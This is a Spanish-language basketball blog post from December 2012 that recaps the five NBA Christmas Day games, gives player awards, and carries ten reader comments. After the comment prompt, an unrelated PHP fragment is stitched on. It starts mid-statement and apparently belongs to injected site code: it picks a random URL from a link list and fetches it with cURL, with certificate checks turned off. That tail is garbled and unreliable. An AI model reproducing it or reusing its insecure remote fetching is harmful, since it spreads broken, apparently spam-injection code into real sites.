Crónica: Christmas Day

26 de December de 2012 por Simon

El Christmas Day es uno de esos días que está marcado tradicionalmente en rojo en el calendario de la NBA. En EEUU los partidos comienzan desde la mañana, lo que provoca que para Europa los partidos comiencen a una hora perfecta: las 18h00 y de ahí hasta la madrugada. ¿Puede haber algún plan mejor para el día de Navidad?

Tras la típica suculenta comida de navidad que se alarga hasta tarde, llegué a casa con el tiempo justo para sentarme en el sillón y poner el Celtics@Brooklyn. Quería verlo aunque confieso que era el partido que menos llamaba mi atención del día. El primer cuarto transcurrió con mucha igualdad por parte de ambos equipos, pero el que parecía llevar un paso más que el rival eran los locales. He de confesar que la llegada a casa de mis sobrinos y tíos a “tomar una copa” trastocó un poco mis apacibles planes de navidad de NBA y sillón. No obstante recuerdo ver a unos Nets incapaces de romper la buena defensa que planteó Boston, a Garnett enseñando a Lopez que gente tan blandita en la NBA no triunfa y a los Celtics correr bastante de la mano de Rondo y Jeff Green. El partido quedó finiquitado al descanso, los dos últimos cuartos fueron de relleno. Lo único interesante de estos dos últimos cuartos fueron los constantes enganchones de Gerald Wallace con los jugadores Celtics, destacando sobre todo el primero tras un rebote ofensivo del propio Wallace. Números muy repartidos en Boston destacando Rondo y desde el banco Green y Sullinger con un altísimo grado de efectividad. Por parte de Brooklyn solo dieron la cara López y Wallace (93-76).

Tras quedarme otra vez solo en casa podía ver tranquilo otro partidazo que nos regala la NBA en este Christmas Day. Sólo decir que los Knicks visitaban el Staples para enfrentar a Lakers ya crea una alta dosis de interés pero si encima llegan como uno de los líderes de la competición y los Lakers están en pleno ascenso el partido se convertía en algo que no podía perderse nadie.

El primer cuarto fue un poco raro, ningún equipo lograba encontrar el ritmo adecuado. Anthony tenía un buen inicio, si te defiende Darius Morris no puede ser de otra manera, pero la entrada de Metta le frenó en seco y no volvió a anotar en el primer cuarto. Mantener a raya a Anthony durante 8 minutos y hacerle fallar 5 o 6 lanzamientos seguidos no es nada despreciable. Kobe terminó el primer cuarto con 13 puntos sin forzar excesivamente. El segundo cuarto supuso un verdadero recital de World Peace, nada menos que 16 puntazos. Gracias a él los Lakers se marcharon por delante al descanso tras ir desde mediado el primer cuarto por detrás. El tercero fue un duelo entre Anthony y Kobe. Ambos se pusieron el traje de máximos anotadores de la liga y nos brindaron un bonito duelo. 17 a 11 ganó Carmelo aunque el partido se mantenía igualado. El último cuarto comenzó como se acabó el tercero, con Melo y Kobe con las armas en alto. Esta vez fue Kobe el que ganó el duelo que había perdido en el tercer cuarto. Consiguió poner a Lakers 5 arriba a mitad del último cuarto, lo que a la postre sería irreversible para los Knicks. Bryant anotó sus últimos puntos a falta de 7 u 8 minutos para el final del partido y a partir de ese momento, no sabemos si de buena o mala gana, dio un paso al lado para que fuera Nash el que dirigiera el cierre del partido. En los últimos 5 minutos Howard y Gasol aportaron 5 puntos cada uno para la causa. En el otro lado Felton quiso coger la batuta del equipo también pero sin ningún acierto. JR Smith anotó un triple que metía a los Knicks a solo una canasta pero falló en el siguiente ataque para empatar. Gasol con un mate cerró el partido. El dato: Kobe no lanzó en los últimos 3 minutos. Creo que habría que irse a sus primeras temporadas en la liga para ver un partido igualado en el que Kobe no lanza en los minutos finales (94-100).

Terminando el partido en el Staples comenzaba el gran partido de la jornada en Miam donde se repetía la final del año pasado de la liga. Tras el duelo Anthony-Kobe llega el duelo de todos los duelos, Durant vs James. Miami comenzó como un auténtico torbellino con un Mario Chalmers encendido. Por un momento pensé que el partido se acababa aquí, al ver marcadores como 3-15 o 16-27 a favor de Miami tan pronto, pero un parcial de 8-0 de la mano del banquillo volvió a meter a Oklahoma en el partido. El segundo cuarto fue un flash back de la final de la liga. Oklahoma algo más entonado pero impreciso y unos Heat que iban un paso por delante y encima tenían una marcha más por si acaso. En el tercer cuarto gracias al despertar de un Durant desaparecido en el primer tiempo y un Westbrook más entonado los Thunder consiguieron por primera vez en el partido ponerse por delante. Hasta 5 puntos de ventaja les dejó coger Miami pero Lebron y compañía reaccionaron y rápido voliveron a ponerse por encima. El último cuarto fue un intercambio de golpes constante. Durant continuaba anotando con fluidez y Chalmers volvía a aparecer de forma estelar tras su gran primer cuarto. Así el partido se mantenía igualado hasta que Westbrook volvió a precipitarse en un par de jugadas y Perkins hizo lo que mejor sabe hacer: restar para su equipo. El partido parecía caer del lado de Miami de forma definitiva aunque tras un par de canastas seguidas de Durant, los Thunder se ponían solo uno abajo a falta de 40 segundos. En el siguiente ataque, James regaló a Bosh un balón para que lo machacara y anotara un mate tranquilizador. Las esperanzas de Oklahoma se acabaron tras un fallo de Durant desde el triple, Westbrook recogió el rebote y lanzó un triple que no entró pero fue objeto de una falta que los árbitros no vieron. Allen termino de matar el partido desde el tiro libre. Partidazo el que nos regalaron anoche ambos equipos (97-103).

Sin tiempo de descanso llegaba el, a priori, partido menos atractivo de la jornada. Se enfrentaban dos estilos: la gran defensa de los Bulls y el juego más despreocupado y ofensivo de los Rockets de Harden y Lin. El primer cuarto, aunque igualado, sentó las bases de lo que iba a ser el partido. Houston consiguió irse a una alta anotación lo que le hacía tener mucho ganado pues habían conseguido llevar el partido a su terreno. Así ontinuaron las cosas en el segundo y tercer cuarto, Chicago no logró mantener el ritmo de anotación de los Rockets lo que hizo que el partido se rompiera a favor de Houston que tuvo un último cuarto apacible gracias a los más de 20 puntos de renta que llevaban. Gran partido del Big Three de Houston: 20-11 para Lin que cada vez va mejorando más en su juego tras un inicio dubitativo, 26 puntos de Harden y 20 puntos y 18 rebotes del turco Asik. Por parte de los Bulls destacó el único jugador en su plantilla activa al que le va este tipo de juego, el pequeñín Nate Robinson, con 27 puntos. (120-97).

Mientras ocurría todo esto que acabamos de contar, en el Staples se llevaba a cabo una transformación a todo gas: pasar de la cancha de Lakers a la de Clippers en pocas horas. Limpiar, vaciar el estadio y volver a llenarlo. Los Nuggets visitaban a los Clippers en un partido que no defraudó y nos dejó un gran repertorio de Highlights como se esperaba de estos dos equipos. El partido fue muy entretenido por el gran número de jugadas espectaculares pero en realidad no tuvo historia. De 20 puntos ganaban los Clippers el segundo cuarto y lo más cerca que volvieron a estar los Nuggets fue precisamente al final del tiempo reglamentario. Poca historia en cuanto a emoción por la victoria tuvo este partido. En Clippers lo mejor fue la segunda unidad capitaneada por Crawford. Paul y Griffin no se vieron obligados a forzar y se reservaron para empresas mayores. En los Nuggets, Koufos y Hamilton aprovecharon los minutos de la basura para ser los más destacados. Con la catorceava victoria consecutiva los Clippers se aúpan al primer puesto de la liga. (100-112).

PREMIOS

MVP: Victoria de campeón de los Miami Heat liderada por el gran Lebron James. Sus 29 puntos, 9 asistencias, 8 reboets y 2 robos fueron demasiado para los Thunder. Kobe Bryant también estuvo soberbio frente los Knicks. Anotó 34 puntos con un 14 de 24 en tiros de campo.

Rookie: El día de Navidad es un día prácticamente reservado a grandes jugadores, veteranos curtidos en 1000 batallas. Entre ellos se coló ayer el céltico Jared Sullinger. Disfrutó de muchos minutos en pista y los aprovechó con 16 puntos y 7 rebotes.

Sorpresa: Hace unos días leíamos rumores de que Nate Robison podría salir de los Bulls. Por ahorrarse unos miserables dólares, Chicago podría perderse partidos como el de ayer: 27 puntos, 4 rebotes y 3 asistencias. De toda manera, seguro que el pequeño base no se quedaría en el paro mucho tiempo. Buenísimos partidos también de Kosta Koufos (16 puntos con un 8 de 8 en tiro y 10 rebotes) y Mario Chalmers (20 puntos).

Decepción: Hace unos días Kirk Hinrich se las ingenió para rememorar tiempos pasados con un gran partido ante los Knicks. Ayer volvió el Hinrich del presente: 4 puntos, 4 asistencias y una defensa inexistente que hizo las delicias de Jeremy Lin y James Harden.

Esfuerzo en vano: Carmelo Anthony y Kevin Durant se encontraron con 2 jugadores que les pueden mirar a la cara sin problemas. El de los Knicks se fue a los 34 puntos y 7 rebotes, mientras que el de los Thunder consiguió 33 puntos y también 7 rebotes pero ambos se quedaron a las puertas del triunfo.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran analisis Simón. Enhorabuena

    – Sobre Lakers
    1- ..cual es el motivo real de que Jamison no juegue?? Decisión técnica o razones personales contra D’Anthoni. Sea cual sea, me parece un error desaprovecharlo de esa manera.
    2- A pesar de que llegan las victorias, me sigue pareciendo incorrecto que Bryant tire mas que Gasol y Howard juntos.

    – Sobre Clippers
    Si los Playoffs emepzasen ahora, los daría como favorito nº 1 al anillo. Así de memoria, puede ser el unico equipo donde los suplentes anotan igual o casi mas que los titulares. Y ojo que Odom empieza a entonarse.

    Del resto, en los Heat, creo que Bosh está haciendo la mejor temporada de su carrera; que los Thunder deberían reforzar su pintura ya que Perkins y Collison cada vez me dan menos garantías

      Citar

  2. simon dice:
    #2

    Hombre Denise ayer para mí fue el ejemplo de partido perfecto por parte de Kobe Bryant. Anotó mucho y con gran eficiencia. Y para nada de forma egoista. A principio del ultimo cuarto puso al equipo por encima de manera definitiva y aunque en los ultimos minutos Nash cogiera el control y los grandotes solucionaran el partido… pero Kobe supo apartarse a un lado, que no borrarse, pues su sola presencia es la que hizo que los Knicks no pudieran cerrarse tanto para defender a los pivots al final de partido. y dio alguna asistencia en esos minutos.

    Un jugador que ha aprendido a hacer eso en los finales de partido a menudo es James, lleva a su equipo hasta los ultimos 3 minutos en los que normalmente se dedica a absorber juego y aprovechando de que las defensas se centran en el encontrar al jugador abierto o solo para que consiga una canasta fácil. El mejor ejemplo lo tienes ayer en el último mate de Bosh como Ibaka está mas pendiente del momento en el que James va a intentar penetrar que de defender a su par.

      Citar

  3. simon dice:
    #3

    Por cierto en lo de los Knicks totalmente de acuerdo, ahora mismo son los número uno de la liga, y faltan Billups y Hill que seguro que encontrarán la manera de aportar.
    Y en lo de Oklahoma llevas razón, Collison vale pero para un rol algo menor del que tiene ahora mismo. y Perkins no vale para nada de nada actualmente, porque ya ni siquiera es una roca al poste bajo, lo mueven con relativa facilidad a menudo. Que saliera el trade por Varejao que se rumorea sería perfecto para los Thunder.

      Citar

  4. HisRoyalAirness dice:
    #4

    Bueno una cosa, el mate de Bosh es una cagada defensiva de locos (de Perkins, por cierto).
    Y a mí, por mucho que Westbrook hiciese el ridículo al final, me pareció un atraco: 2+1 no pitado a KD, falta de 3 tiros a RW y personal en ataque inexistente de RW a Ray Allen. Siempre odiaré estas actitudes arbitrales tan descaradas

      Citar

  5. Futurman dice:
    #5

    Pues será que a Thunder no le pitan pocas faltas inexistentes o “poco rigurosas”… que reciban de su propia medicina de vez en cuando está bien, que a Durant le regalan 2-4 libres por partido.

      Citar

  6. oli dice:
    #6

    Totalmente de acuerdo con HisRoyalAirness, los últimos minutos del okc-miami fueron vergonzosos con las decisisiones arbitrales tan caseras, fue un robo descarado.

    Por lo demás me alegro de la victoria de los Lakers, poco a poco van mejorando y se nota mucho la vuelta de Nash sobretodo en ataque, y los clippers ahora mismo son la alternativa más fuerte por nivel de plantilla y jugadores a Miami y OKC.

      Citar

  7. Enzo dice:
    #7

    Definitivamente lo de los Clippers va enserio y todavia faltan Billups y Grant Hill en la rotacion aunque aun falta mucho veamos si pueden mantenerse.

      Citar

  8. Esteban dice:
    #8

    es una pena que d´antoni no use a jamison, pero por optro lado, con lo que aun puede dar y su salario minimo es una pieza muy canejable por un alero tirador

    muchos mcuhos equipos pueden estar interesados en un 4 abierto que pueda dar tanto gol y cobrar tan poco, solo habria que ver por quien canejarlo

      Citar

  9. Pop dice:
    #9

    Viendo basket a las 4 a.m. y con alguna evidente copa de más, mientras observo como ese anti-santaclaus negro que es Hardem no para de dejar regalitos en la chimenea de los Wolves, dos cuestiones se me vienen a la mente:

    – ¿Hay algo más desagradable que ver cómo cada 30 segundos Love se pasa la camiseta por la barba sudada y acto seguido se la introduce en la boca (la camiseta)?

    – ¿No salía Omer Asik en la gran pantalla compartiendo escenas con Tommy Lee Jones en El Fugitivo? http://www.aveleyman.com/ActorCredit.aspx?ActorID=18678

    Salud.

      Citar

  10. TheDeerHunter dice:
    #10

    Pop:
    Viendo basket a las 4 a.m. y con alguna evidente copa de más, mientras observo como ese anti-santaclaus negro que es Hardem no para de dejar regalitos en la chimenea de los Wolves, dos cuestiones se me vienen a la mente:

    – ¿Hay algo más desagradable que ver cómo cada 30 segundos Love se pasa la camiseta por la barba sudada y acto seguido se la introduce en la boca (la camiseta)?

    – ¿No salía Omer Asik en la gran pantalla compartiendo escenas con Tommy Lee Jones en El Fugitivo? http://www.aveleyman.com/ActorCredit.aspx?ActorID=18678

    Salud.

    Este es definitivamente uno de los mejores comentarios de la historia de TJNBA XD XD XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>